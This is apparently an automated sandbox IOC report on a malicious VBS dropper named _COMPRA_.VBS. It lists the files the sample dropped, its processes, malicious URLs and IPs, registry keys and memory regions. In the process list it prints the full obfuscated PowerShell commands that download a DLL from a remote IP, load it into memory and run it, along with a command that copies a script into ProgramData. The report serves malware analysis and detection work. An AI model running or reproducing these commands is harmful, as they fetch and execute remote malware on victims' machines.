IOC Report
_COMPRA_.VBS

loading gif

Files

File Path
Type
Category
Malicious
_COMPRA_.VBS
Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aldovbbj.0fp.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_era3lqvo.5cl.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u0rhufd0.t31.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uh3x3r0z.4n5.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yb2i5nut.0mf.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zpnb2wuj.mn5.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KCOOD8DGHH3SAH4080U5.temp
data
dropped
C:\Users\user\Documents\20220514\PowerShell_transcript.035347.PDp+ZyLV.20220514152147.txt
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\Documents\20220514\PowerShell_transcript.035347.yPH19KjK.20220514152144.txt
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
dropped
C:\Users\user\Documents\20220514\PowerShell_transcript.035347.z_SSE0i6.20220514152153.txt
UTF-8 Unicode (with BOM) text, with CRLF line terminators
dropped
There are 4 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\_COMPRA_.VBS"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwBuAG???AdwAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AaABnAH???AdQByAHQAdAAvADEANwAxAC4AOAAxAC4AMwAzADEALgA1ADkAMQAvAC8AOgBwAHQAdABoACcAKQApAA==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/new.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.hguurtt/171.81.331.591//:ptth'))
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Copy-Item -Path C:\Windows\Temp\*.vbs -Destination C:\ProgramData\Done.vbs
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://20.106.232.4/rumpe/newrumpe.pdf
20.106.232.4
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://go.micro
unknown
malicious
http://195.133.18.171
unknown
malicious
https://contoso.com/
unknown
malicious
http://www.microsoft.co
unknown
malicious
https://contoso.com/License
unknown
malicious
https://contoso.com/Icon
unknown
malicious
http://195.133.18.171x
unknown
malicious
http://20.106.232.4/dll/new.pdf
20.106.232.4
malicious
http://20.106.232.48
unknown
malicious
http://20.106.232.4x
unknown
malicious
http://20.106.232.4
unknown
malicious
http://195.133.18.171/ttruugh.txt
unknown
malicious
http://crl.microq
unknown
malicious
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://nuget.org/nuget.exe
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 10 hidden URLs, click here to show them.

IPs

IP
Domain
Country
Malicious
20.106.232.4
unknown
United States
malicious
195.133.18.171
unknown
Russian Federation
192.168.2.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
19035B14000
heap
page read and write
20DBA995000
trusted library allocation
page read and write
20DABE9C000
trusted library allocation
page read and write
19035B8F000
heap
page read and write
2E93FA05000
heap
page read and write
7FFC01490000
trusted library allocation
page read and write
20DC2970000
trusted library allocation
page read and write
19035B7D000
heap
page read and write
FD710FB000
stack
page read and write
2427BD00000
trusted library allocation
page read and write
3BA99FE000
stack
page read and write
2427BC9E000
heap
page read and write
15ED9DE0000
trusted library allocation
page read and write
15ED9F19000
heap
page read and write
1DD54CC0000
heap
page read and write
20DC2A98000
heap
page read and write
1569CA20000
heap
page read and write
7FFC010ED000
trusted library allocation
page execute and read and write
15EC1CE0000
trusted library allocation
page read and write
2489A064000
heap
page read and write
3BA9CFF000
stack
page read and write
AED597F000
stack
page read and write
211D8830000
heap
page read and write
20DA8A5F000
heap
page read and write
2427BCF0000
heap
page execute and read and write
11329302000
heap
page read and write
20DABEA5000
trusted library allocation
page read and write
20DC29B0000
trusted library allocation
page read and write
1DD5A450000
trusted library allocation
page read and write
1DD55704000
heap
page read and write
1903547C000
heap
page read and write
7FFC01390000
trusted library allocation
page read and write
211D8884000
heap
page read and write
20DC2B50000
heap
page read and write
1DD5A328000
trusted library allocation
page read and write
1DD54E78000
heap
page read and write
242014C1000
trusted library allocation
page read and write
AED547E000
stack
page read and write
15EBFEAE000
heap
page read and write
24279C4C000
heap
page read and write
1569C866000
heap
page read and write
20DC27F7000
heap
page read and write
11329313000
heap
page read and write
F77E0FF000
stack
page read and write
19035B8E000
heap
page read and write
20DC2ABB000
heap
page read and write
286107D000
stack
page read and write
1B56A3C0000
trusted library allocation
page read and write
4A4EA7D000
stack
page read and write
F77D67B000
stack
page read and write
15ED9F21000
heap
page read and write
7FFC013C0000
trusted library allocation
page read and write
19035B96000
heap
page read and write
19035BB4000
heap
page read and write
7FFC01190000
trusted library allocation
page read and write
7FFC012D0000
trusted library allocation
page execute and read and write
7FFC013B0000
trusted library allocation
page read and write
15EBFDC0000
heap
page read and write
211D887A000
heap
page read and write
190354F7000
heap
page read and write
15EC22F2000
trusted library allocation
page read and write
20DAB81C000
trusted library allocation
page read and write
2427BD10000
trusted library allocation
page read and write
1DD54F02000
heap
page read and write
7FFC01450000
trusted library allocation
page read and write
15ED9E10000
trusted library allocation
page read and write
CD934FE000
stack
page read and write
20DAB847000
trusted library allocation
page read and write
21780858000
heap
page read and write
19035B9B000
heap
page read and write
C13B7B000
stack
page read and write
4A4E877000
stack
page read and write
7FFC013F0000
trusted library allocation
page read and write
1DD5A320000
trusted library allocation
page read and write
10CAFFF000
stack
page read and write
20DC2920000
trusted library allocation
page read and write
2427BD9D000
heap
page read and write
7FFC011E6000
trusted library allocation
page execute and read and write
7FFC013F0000
trusted library allocation
page read and write
21780800000
heap
page read and write
1B56A508000
heap
page read and write
19035454000
heap
page read and write
3BA977E000
stack
page read and write
20DBA7F1000
trusted library allocation
page read and write
19035B0A000
heap
page read and write
20DC2990000
trusted library allocation
page read and write
63E5A7B000
stack
page read and write
28560C40000
heap
page read and write
2489A04D000
heap
page read and write
211D884F000
heap
page read and write
7FFC011B6000
trusted library allocation
page read and write
15EBFDC9000
heap
page read and write
7FFC01335000
trusted library allocation
page read and write
7FFC011C0000
trusted library allocation
page execute and read and write
2E941CB6000
heap
page read and write
20DC29C0000
trusted library allocation
page read and write
7FFC01113000
trusted library allocation
page read and write
EE683FE000
stack
page read and write
19035B7B000
heap
page read and write
20DC2940000
trusted library allocation
page read and write
20DC3100000
trusted library allocation
page read and write
2427BBB0000
heap
page read and write
242014B9000
trusted library allocation
page read and write
2038897F000
heap
page read and write
15ED9F32000
heap
page read and write
7FFC01350000
trusted library allocation
page read and write
15EC1D6F000
trusted library allocation
page read and write
15EBFE1D000
heap
page read and write
20DC29A0000
trusted library allocation
page read and write
19035B9C000
heap
page read and write
7FFC01300000
trusted library allocation
page read and write
20DC3300000
trusted library allocation
page read and write
15EC1780000
trusted library allocation
page read and write
20DC2AF8000
heap
page read and write
2489A027000
heap
page read and write
2490605A000
heap
page read and write
20DBA852000
trusted library allocation
page read and write
1DD5A32E000
trusted library allocation
page read and write
19035B7B000
heap
page read and write
20DC30E0000
trusted library allocation
page read and write
20DC2991000
trusted library allocation
page read and write
7FFC01300000
trusted library allocation
page read and write
20DAA494000
trusted library allocation
page read and write
20DABCAF000
trusted library allocation
page read and write
20DC3220000
trusted library allocation
page read and write
21781002000
trusted library allocation
page read and write
1DD55700000
heap
page read and write
19035400000
heap
page read and write
CD9377A000
stack
page read and write
3BA967F000
stack
page read and write
20DA8AA0000
heap
page read and write
2E93FA36000
heap
page read and write
24279B00000
heap
page read and write
19035B71000
heap
page read and write
211D8849000
heap
page read and write
3BA938E000
stack
page read and write
1DD54F14000
heap
page read and write
1DD5A344000
trusted library allocation
page read and write
20DC29A0000
trusted library allocation
page read and write
20DC29C0000
trusted library allocation
page read and write
19035B75000
heap
page read and write
2E941D54000
heap
page read and write
24210010000
trusted library allocation
page read and write
7FFC01330000
trusted library allocation
page read and write
190354B5000
heap
page read and write
211D882F000
heap
page read and write
CD9327E000
stack
page read and write
1569CB95000
heap
page read and write
286117E000
stack
page read and write
24899FE0000
trusted library allocation
page read and write
190354A4000
heap
page read and write
19035B7D000
heap
page read and write
15ED9F21000
heap
page read and write
1DD54E88000
heap
page read and write
211D883B000
heap
page read and write
2E9418E6000
heap
page read and write
20DC3160000
trusted library allocation
page read and write
2E9418D6000
heap
page read and write
7FFC01420000
trusted library allocation
page read and write
15EBFE0B000
heap
page read and write
1DD54C60000
heap
page read and write
1DD56180000
trusted library allocation
page read and write
2E93FA08000
heap
page read and write
24210062000
trusted library allocation
page read and write
2E9418F0000
heap
page read and write
113292CB000
heap
page read and write
1DD54E13000
heap
page read and write
20DC2990000
trusted library allocation
page read and write
19035B71000
heap
page read and write
7FFC01320000
trusted library allocation
page read and write
19036002000
heap
page read and write
3BA9B7E000
stack
page read and write
1903544E000
heap
page read and write
20DC3130000
trusted library allocation
page read and write
2427B570000
heap
page readonly
15EBFEBC000
heap
page read and write
2427BC3C000
heap
page read and write
AED577E000
stack
page read and write
20DC29A0000
trusted library allocation
page read and write
7FFC01220000
trusted library allocation
page execute and read and write
1569C870000
heap
page read and write
7FFC012E2000
trusted library allocation
page read and write
203888A0000
heap
page read and write
1DD5A61E000
heap
page read and write
7FFC01340000
trusted library allocation
page read and write
19035BA8000
heap
page read and write
20DAB87D000
trusted library allocation
page read and write
7FFC010F0000
trusted library allocation
page read and write
2427BD40000
heap
page read and write
2427BBC0000
heap
page read and write
1DD5A570000
trusted library allocation
page read and write
2427BCE0000
trusted library allocation
page read and write
7FFC01420000
trusted library allocation
page read and write
F77DEFF000
stack
page read and write
2D584D13000
heap
page read and write
63E597C000
stack
page read and write
1B56A470000
heap
page read and write
15ED9EC7000
heap
page read and write
15EC2295000
trusted library allocation
page read and write
1DD5A3F0000
trusted library allocation
page read and write
20DA8AC0000
heap
page read and write
21780859000
heap
page read and write
EE679EA000
stack
page read and write
24200B78000
trusted library allocation
page read and write
2E9418E3000
heap
page read and write
20DA8B65000
heap
page read and write
C13A7E000
stack
page read and write
203896C0000
trusted library allocation
page read and write
20DC29A0000
trusted library allocation
page read and write
19035B7D000
heap
page read and write
19035B72000
heap
page read and write
20DC3350000
trusted library allocation
page read and write
28560BB0000
trusted library allocation
page read and write
7FFC012B4000
trusted library allocation
page read and write
211D8847000
heap
page read and write
15EC1C68000
trusted library allocation
page read and write
1DD54C50000
heap
page read and write
190354C7000
heap
page read and write
15EC1CA7000
trusted library allocation
page read and write
2E93FA36000
heap
page read and write
1DD555F0000
trusted library allocation
page read and write
113291D0000
trusted library allocation
page read and write
211D8E60000
trusted library allocation
page read and write
19035457000
heap
page read and write
20388910000
trusted library allocation
page read and write
7FFC01370000
trusted library allocation
page read and write
1569CB90000
heap
page read and write
20DA8B30000
heap
page readonly
2CA42FF000
stack
page read and write
20DC3170000
trusted library allocation
page read and write
2E941A9A000
heap
page read and write
1569C875000
heap
page read and write
15ED9F32000
heap
page read and write
19035B72000
heap
page read and write
15EC1FC8000
trusted library allocation
page read and write
2489A113000
heap
page read and write
2860E75000
stack
page read and write
1DD5A6FA000
heap
page read and write
20DC29B0000
trusted library allocation
page read and write
20DC30C0000
trusted library allocation
page read and write
24200B6F000
trusted library allocation
page read and write
1DD5A649000
heap
page read and write
2D584C02000
heap
page read and write
1DD5A600000
heap
page read and write
1DD55759000
heap
page read and write
7DF4B12B0000
trusted library allocation
page execute and read and write
3BA93CF000
stack
page read and write
7FFC01310000
trusted library allocation
page read and write
20DABCB8000
trusted library allocation
page read and write
286127A000
stack
page read and write
20DC31F0000
trusted library allocation
page read and write
15EC2284000
trusted library allocation
page read and write
20DAB59E000
trusted library allocation
page read and write
2E9418F9000
heap
page read and write
20DA8B20000
trusted library allocation
page read and write
7FFC01450000
trusted library allocation
page read and write
2E9419D6000
heap
page read and write
19035413000
heap
page read and write
113290D0000
heap
page read and write
2CA44F8000
stack
page read and write
7FFC01340000
trusted library allocation
page read and write
19035B76000
heap
page read and write
1DD5A360000
trusted library allocation
page read and write
286214D000
stack
page read and write
2178085A000
heap
page read and write
15EDA14C000
heap
page read and write
EB3356B000
stack
page read and write
2860EFE000
stack
page read and write
2178085C000
heap
page read and write
20DAB826000
trusted library allocation
page read and write
19035B9B000
heap
page read and write
20DC29B0000
trusted library allocation
page read and write
7FFC012F0000
trusted library allocation
page execute and read and write
20DAA85C000
trusted library allocation
page read and write
20DAB875000
trusted library allocation
page read and write
211D882E000
heap
page read and write
CD935FE000
stack
page read and write
7FFC01100000
trusted library allocation
page read and write
2421006E000
trusted library allocation
page read and write
2427BD10000
trusted library allocation
page read and write
20DC2990000
trusted library allocation
page read and write
1DD5A341000
trusted library allocation
page read and write
20388930000
heap
page read and write
2E93FA25000
heap
page read and write
2E93FA07000
heap
page read and write
2E941C6E000
heap
page read and write
20388750000
trusted library allocation
page read and write
EE685FB000
stack
page read and write
24200211000
trusted library allocation
page read and write
1569C896000
heap
page read and write
20DABC84000
trusted library allocation
page read and write
15ED9F4F000
heap
page read and write
20DC3390000
trusted library allocation
page read and write
24200B67000
trusted library allocation
page read and write
1DD5A6E9000
heap
page read and write
3BA9A7E000
stack
page read and write
1903544D000
heap
page read and write
20DC2A24000
heap
page read and write
24279A70000
heap
page read and write
24899E80000
heap
page read and write
1569C885000
heap
page read and write
20DC32A0000
trusted library allocation
page read and write
20388BD0000
heap
page read and write
1DD5A350000
trusted library allocation
page read and write
15ED9E00000
trusted library allocation
page read and write
2427B6D5000
heap
page read and write
EB33C7E000
stack
page read and write
1B56A43C000
heap
page read and write
63E555C000
stack
page read and write
19035B14000
heap
page read and write
7FFC012BC000
trusted library allocation
page read and write
1569C877000
heap
page read and write
1DD5A6D8000
heap
page read and write
21780770000
heap
page read and write
7FFC01380000
trusted library allocation
page read and write
19035B8C000
heap
page read and write
20DC29A0000
trusted library allocation
page read and write
15ED9F4F000
heap
page read and write
3BA96FF000
stack
page read and write
15ED9E00000
trusted library allocation
page read and write
20DC29A0000
trusted library allocation
page read and write
7FFC012C2000
trusted library allocation
page read and write
CD9347E000
stack
page read and write
F77DAFF000
stack
page read and write
7FFC012B1000
trusted library allocation
page read and write
20DBAA07000
trusted library allocation
page read and write
19035B96000
heap
page read and write
15ED9F49000
heap
page read and write
20DAA7F1000
trusted library allocation
page read and write
43E6F7B000
stack
page read and write
15EC20F2000
trusted library allocation
page read and write
1DD5A480000
remote allocation
page read and write
20DC33C0000
trusted library allocation
page read and write
2E93FA06000
heap
page read and write
21780813000
heap
page read and write
19036021000
heap
page read and write
24279BA8000
heap
page read and write
2178088A000
heap
page read and write
20389710000
trusted library allocation
page read and write
19035B7B000
heap
page read and write
211D8700000
heap
page read and write
2E93F910000
heap
page read and write
10CB4FD000
stack
page read and write
24899EE0000
heap
page read and write
20DC2940000
trusted library allocation
page read and write
20DC3400000
trusted library allocation
page read and write
19035B98000
heap
page read and write
20DC2970000
trusted library allocation
page read and write
21780913000
heap
page read and write
2427BBA4000
trusted library allocation
page read and write
2427B6A0000
heap
page execute and read and write
2427BCD0000
trusted library allocation
page read and write
20DC29C0000
trusted library allocation
page read and write
19035B96000
heap
page read and write
7FFC01300000
trusted library allocation
page read and write
20DAAA02000
trusted library allocation
page read and write
2861337000
stack
page read and write
11329A02000
heap
page read and write
19035B8E000
heap
page read and write
19035B1C000
heap
page read and write
24279C49000
heap
page read and write
211D8869000
heap
page read and write
7FFC013E0000
trusted library allocation
page read and write
7FFC01100000
trusted library allocation
page read and write
2178083C000
heap
page read and write
19035B7B000
heap
page read and write
19035BB9000
heap
page read and write
2E94198E000
heap
page read and write
1DD5A430000
trusted library allocation
page read and write
20DAA490000
trusted library allocation
page read and write
20DC2B00000
heap
page read and write
20DAA4A5000
heap
page read and write
19036002000
heap
page read and write
24201547000
trusted library allocation
page read and write
7FFC01410000
trusted library allocation
page read and write
20DC2990000
trusted library allocation
page read and write
2427B5B0000
heap
page execute and read and write
2489A048000
heap
page read and write
7FFC011E6000
trusted library allocation
page execute and read and write
CD939FB000
stack
page read and write
19035B6F000
heap
page read and write
20DAB8A3000
trusted library allocation
page read and write
1DD5A3F0000
trusted library allocation
page read and write
24906102000
heap
page read and write
2E94188E000
heap
page read and write
1DD5A3F0000
trusted library allocation
page read and write
15EC20E1000
trusted library allocation
page read and write
20DABEBA000
trusted library allocation
page read and write
EE67DFE000
stack
page read and write
20388980000
heap
page read and write
15EBFD50000
heap
page read and write
211D8829000
heap
page read and write
2D584C13000
heap
page read and write
20DC2981000
trusted library allocation
page read and write
4A4E97E000
stack
page read and write
19035B9A000
heap
page read and write
190351B0000
heap
page read and write
20DC2A00000
heap
page read and write
1DD54E6E000
heap
page read and write
15EBFDB0000
heap
page read and write
7FFC0111C000
trusted library allocation
page read and write
11329229000
heap
page read and write
19035B72000
heap
page read and write
1DD5A616000
heap
page read and write
7DF496E30000
trusted library allocation
page execute and read and write
2427BCF7000
heap
page execute and read and write
19035B9B000
heap
page read and write
211D8902000
heap
page read and write
1DD54E99000
heap
page read and write
7FFC01310000
trusted library allocation
page read and write
20DC3190000
trusted library allocation
page read and write
203896B0000
trusted library allocation
page read and write
1DD5A470000
trusted library allocation
page read and write
F77DDFF000
stack
page read and write
15EBFEBC000
heap
page read and write
2427BC63000
heap
page read and write
1DD5A6F6000
heap
page read and write
7FFC01440000
trusted library allocation
page read and write
7FFC013E0000
trusted library allocation
page read and write
1569C7D0000
heap
page read and write
20388998000
heap
page read and write
15EDA14C000
heap
page read and write
1569C850000
heap
page read and write
20DC2970000
trusted library allocation
page read and write
7FFC013C0000
trusted library allocation
page read and write
190354AB000
heap
page read and write
20DC2B5C000
heap
page read and write
2427BCD0000
trusted library allocation
page read and write
1B56A447000
heap
page read and write
4A4EB7E000
stack
page read and write
21780F40000
trusted library allocation
page read and write
28620CE000
stack
page read and write
107067E000
stack
page read and write
7FFC013D0000
trusted library allocation
page read and write
20DC2940000
trusted library allocation
page read and write
15EC229D000
trusted library allocation
page read and write
2427BD10000
trusted library allocation
page read and write
2CA427F000
stack
page read and write
3BA987E000
stack
page read and write
43E72FF000
stack
page read and write
7FFC013F0000
trusted library allocation
page read and write
3BA997F000
stack
page read and write
7FFC01390000
trusted library allocation
page read and write
20388978000
heap
page read and write
20DA89DA000
heap
page read and write
19036002000
heap
page read and write
20DC29B0000
trusted library allocation
page read and write
20DC2E00000
heap
page read and write
2860F7E000
stack
page read and write
1AD07E000
stack
page read and write
4A4E1BB000
stack
page read and write
7FFC013D0000
trusted library allocation
page read and write
4A4E6FB000
stack
page read and write
63E5BF7000
stack
page read and write
15EC1C20000
heap
page execute and read and write
28560C58000
heap
page read and write
19035B4D000
heap
page read and write
20DC29C0000
trusted library allocation
page read and write
2427BCD0000
trusted library allocation
page read and write
15EC1C40000
heap
page read and write
2489A000000
heap
page read and write
19035BA8000
heap
page read and write
190354EA000
heap
page read and write
24200B39000
trusted library allocation
page read and write
2E93FA0A000
heap
page read and write
20DC33C7000
trusted library allocation
page read and write
28616BC000
stack
page read and write
7FFC01335000
trusted library allocation
page read and write
24899E70000
heap
page read and write
2D584B60000
trusted library allocation
page read and write
24905E60000
heap
page read and write
2489A064000
heap
page read and write
286163F000
stack
page read and write
19035B96000
heap
page read and write
2E93FC15000
heap
page read and write
20DC29A0000
trusted library allocation
page read and write
24210001000
trusted library allocation
page read and write
7FFC011A0000
trusted library allocation
page execute and read and write
7FFC010E0000
trusted library allocation
page read and write
2038897F000
heap
page read and write
190359E0000
remote allocation
page read and write
1DD55615000
heap
page read and write
286153F000
stack
page read and write
24279AC0000
unkown
page readonly
2489A089000
heap
page read and write
15ED9F23000
heap
page read and write
20DC32D0000
trusted library allocation
page read and write
2489A108000
heap
page read and write
211D884D000
heap
page read and write
20DAB8A6000
trusted library allocation
page read and write
7FFC012B0000
trusted library allocation
page execute and read and write
21780865000
heap
page read and write
1ACDAC000
stack
page read and write
7FFC01110000
trusted library allocation
page read and write
20DAB816000
trusted library allocation
page read and write
19036002000
heap
page read and write
28560B20000
heap
page read and write
28612BF000
stack
page read and write
20DC29B0000
trusted library allocation
page read and write
24200B9B000
trusted library allocation
page read and write
2D584C71000
heap
page read and write
20DC29B0000
trusted library allocation
page read and write
1B56A44B000
heap
page read and write
4A4E5FB000
stack
page read and write
20DC2950000
trusted library allocation
page read and write
1DD5A320000
trusted library allocation
page read and write
19035485000
heap
page read and write
28560D02000
heap
page read and write
2E9417F0000
heap
page read and write
20388BD9000
heap
page read and write
1DD5A460000
trusted library allocation
page read and write
20DC33D0000
trusted library allocation
page read and write
20DA89E8000
heap
page read and write
15ED9E73000
heap
page read and write
2490603D000
heap
page read and write
2E941E70000
heap
page read and write
15EC1D64000
trusted library allocation
page read and write
2489A102000
heap
page read and write
EE682FE000
stack
page read and write
20DC2980000
trusted library allocation
page read and write
7FFC01430000
trusted library allocation
page read and write
1DD54EAA000
heap
page read and write
20DC3290000
trusted library allocation
page read and write
24201494000
trusted library allocation
page read and write
2E941EB9000
heap
page read and write
20DC3080000
trusted library allocation
page read and write
10CB3FF000
stack
page read and write
7FFC01360000
trusted library allocation
page read and write
FD70BBB000
stack
page read and write
7FFC01397000
trusted library allocation
page read and write
1DD555F3000
trusted library allocation
page read and write
7FFC01430000
trusted library allocation
page read and write
217807E0000
heap
page read and write
7FFC01380000
trusted library allocation
page read and write
19035516000
heap
page read and write
20DC3320000
trusted library allocation
page read and write
15EBFE46000
heap
page read and write
20DC2ABB000
heap
page read and write
C142FF000
stack
page read and write
20DC31C0000
trusted library allocation
page read and write
211D8841000
heap
page read and write
2490608B000
heap
page read and write
2427BBA1000
trusted library allocation
page read and write
1DD5A400000
trusted library allocation
page read and write
63E5CFE000
stack
page read and write
21780900000
heap
page read and write
7FFC01420000
trusted library allocation
page read and write
2E93FA0A000
heap
page read and write
1569C880000
heap
page read and write
20DC2A75000
heap
page read and write
15EBFDFC000
heap
page read and write
7FFC01340000
trusted library allocation
page read and write
2427BA2A000
heap
page read and write
7FFC01410000
trusted library allocation
page read and write
15ED9DF1000
trusted library allocation
page read and write
10707F9000
stack
page read and write
20DC32B0000
trusted library allocation
page read and write
20388880000
heap
page read and write
19035429000
heap
page read and write
20DC2991000
trusted library allocation
page read and write
2E93F9E8000
heap
page read and write
1DD54E8E000
heap
page read and write
15EC2259000
trusted library allocation
page read and write
20DC30A0000
trusted library allocation
page read and write
7FFC01103000
trusted library allocation
page execute and read and write
63E5DFF000
stack
page read and write
15EC17E6000
heap
page read and write
20DC2AF5000
heap
page read and write
20DA8A92000
heap
page read and write
2CA3FBA000
stack
page read and write
1DD55CE0000
trusted library allocation
page read and write
CD9397E000
stack
page read and write
3BA98FE000
stack
page read and write
15EBFDB5000
heap
page read and write
AED587E000
stack
page read and write
20388740000
heap
page read and write
F77DFFF000
stack
page read and write
211D8845000
heap
page read and write
7FFC010FC000
trusted library allocation
page read and write
24279C47000
heap
page read and write
AED51AB000
stack
page read and write
1569C873000
heap
page read and write
19035B5C000
heap
page read and write
15ED1CB1000
trusted library allocation
page read and write
24906075000
heap
page read and write
2E93FC10000
heap
page read and write
2427BCD0000
trusted library allocation
page read and write
2D584C55000
heap
page read and write
1B56A453000
heap
page read and write
24906088000
heap
page read and write
15ED1C60000
trusted library allocation
page read and write
43E70FF000
stack
page read and write
2427BD9F000
heap
page read and write
2E93FA25000
heap
page read and write
7FFC01470000
trusted library allocation
page read and write
19035B7D000
heap
page read and write
20DC2A13000
heap
page read and write
7FFC01104000
trusted library allocation
page read and write
1DD5A480000
remote allocation
page read and write
7FFC01291000
trusted library allocation
page read and write
24201550000
trusted library allocation
page read and write
20DA8890000
remote allocation
page read and write
20DA8B00000
trusted library allocation
page read and write
19035B9B000
heap
page read and write
7FFC01196000
trusted library allocation
page read and write
19035B7C000
heap
page read and write
211D884A000
heap
page read and write
EB33A7C000
stack
page read and write
20DC2960000
trusted library allocation
page read and write
19035B71000
heap
page read and write
19036002000
heap
page read and write
7FFC013C0000
trusted library allocation
page read and write
11329200000
heap
page read and write
2178085D000
heap
page read and write
F77E1FE000
stack
page read and write
1B56A42C000
heap
page read and write
24279BE0000
heap
page read and write
1DD55602000
heap
page read and write
19035449000
heap
page read and write
2178084A000
heap
page read and write
7FFC012A2000
trusted library allocation
page read and write
C140FA000
stack
page read and write
F77D87B000
stack
page read and write
63E5AFE000
stack
page read and write
2427B560000
trusted library allocation
page read and write
211D8850000
heap
page read and write
19035BBB000
heap
page read and write
24279AB0000
unkown
page readonly
20DC2980000
trusted library section
page read and write
2D584D02000
heap
page read and write
20DA8A51000
heap
page read and write
19035B5C000
heap
page read and write
20DC2F20000
trusted library allocation
page read and write
20DC32F0000
trusted library allocation
page read and write
2E93F990000
heap
page read and write
15EC17A0000
trusted library allocation
page read and write
2427BD64000
heap
page read and write
11329070000
heap
page read and write
20DC2980000
trusted library allocation
page read and write
2427BF40000
heap
page read and write
2427B610000
trusted library allocation
page read and write
15EBFD70000
heap
page read and write
7FFC012B4000
trusted library allocation
page read and write
20DC3240000
trusted library allocation
page read and write
2D584B30000
heap
page read and write
286157F000
stack
page read and write
20DA8A28000
heap
page read and write
7FFC012E0000
trusted library allocation
page read and write
24906013000
heap
page read and write
1DD54F07000
heap
page read and write
20DAB5A5000
trusted library allocation
